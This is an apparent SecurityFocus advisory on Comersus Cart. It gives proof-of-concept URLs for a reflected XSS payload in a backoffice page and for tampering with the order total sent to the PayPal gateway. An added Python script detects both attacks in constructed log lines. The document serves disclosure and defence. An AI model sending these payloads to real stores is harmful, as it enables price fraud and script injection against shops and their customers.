Comersus Open Technologies Comersus Cart Multiple Vulnerabilities

No exploit is required.

The following proof of concept examples are available:

XSS:
http://www.example.com/comersus/backofficeLite/comersus_backoffice_message.asp?message=<script>alert("VULNERABLE_TO_XSS")</script>

Order Manipulation:
http://www.example.com/comersus/store/comersus_gatewayPayPal.asp?idOrder=2002&OrderTotal=|102|222|228|22|130|36|209&name=Thomas&lastName=Ryan&address=123+Easy+Modify+Street&city=New+York&state=NY&zip=10001&country=US&phone=212%2D857%2D1731&email=tommy%40providesecurity%2Ecom&orderDetails=1x+%23RDHT%2F11+Red+Hat+Deluxe+WorkStation+Options%3A+%3D+%2479%2E00%0D%0A2x+%23WME%2F1+Windows+Millennium+Edition+Options%3A+%3D+%24398%2E00%0D%0A1x+%23BPRES2%2F6+So+You+Want+to+Be+President%3F+Options%3A+%3D+%2414%2E39%0D%0A
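The two issues above share one root cause: request parameters (`message`, `OrderTotal`) are trusted without validation. The detection script below is an added example, not part of the advisory or of Comersus; it runs over constructed IIS-style log lines modelled on the PoC requests and flags a reflected script payload in `message` and an `OrderTotal` that is malformed or disagrees with the server-side order record (the stored total 491.39 is assumed from the line items in the PoC, not taken from a real database).

```python
import re
from urllib.parse import parse_qs

# Constructed log lines (date time method cs-uri-stem cs-uri-query status),
# modelled on the PoC URLs in the advisory; not real traffic.
SAMPLE_LOG = """\
2010-03-01 12:00:01 GET /comersus/backofficeLite/comersus_backoffice_message.asp message=%3Cscript%3Ealert(%22VULNERABLE_TO_XSS%22)%3C/script%3E 200
2010-03-01 12:00:02 GET /comersus/store/comersus_gatewayPayPal.asp idOrder=2002&OrderTotal=|102|222|228|22|130|36|209&name=Thomas 200
2010-03-01 12:00:03 GET /comersus/store/comersus_gatewayPayPal.asp idOrder=2002&OrderTotal=1.00&name=Thomas 200
2010-03-01 12:00:04 GET /comersus/store/comersus_gatewayPayPal.asp idOrder=2002&OrderTotal=491.39&name=Thomas 200
2010-03-01 12:00:05 GET /comersus/backofficeLite/comersus_backoffice_message.asp message=Order+saved 200
"""

# Assumed server-side order totals: the value the gateway handler should trust
# instead of the query string (491.39 = 79.00 + 398.00 + 14.39 from the PoC items).
STORED_TOTALS = {"2002": "491.39"}

SCRIPT_RE = re.compile(r"<\s*/?\s*script|javascript:", re.I)
MONEY_RE = re.compile(r"^\d+(\.\d{1,2})?$")

def analyze_request(stem, query, stored_totals=STORED_TOTALS):
    """Return finding labels for one request; an empty list means it looks benign."""
    # parse_qs percent-decodes values, so "<script>" is visible after decoding.
    params = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    findings = []
    if stem.endswith("comersus_backoffice_message.asp"):
        if SCRIPT_RE.search(params.get("message", "")):
            findings.append("reflected-xss-probe")
    if stem.endswith("comersus_gatewayPayPal.asp"):
        total = params.get("OrderTotal", "")
        order = params.get("idOrder", "")
        if not MONEY_RE.match(total):
            findings.append("malformed-OrderTotal")       # e.g. pipe-delimited junk
        elif order in stored_totals and total != stored_totals[order]:
            findings.append("OrderTotal-mismatch")        # client-supplied price tampering
    return findings

def scan_log(text):
    """Scan whole log text; return (script name, finding) pairs in log order."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue
        stem, query = parts[3], parts[4]
        for finding in analyze_request(stem, query):
            hits.append((stem.rsplit("/", 1)[-1], finding))
    return hits

if __name__ == "__main__":
    for script, finding in scan_log(SAMPLE_LOG):
        print(f"{script}: {finding}")
```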

Copyright 2010, SecurityFocus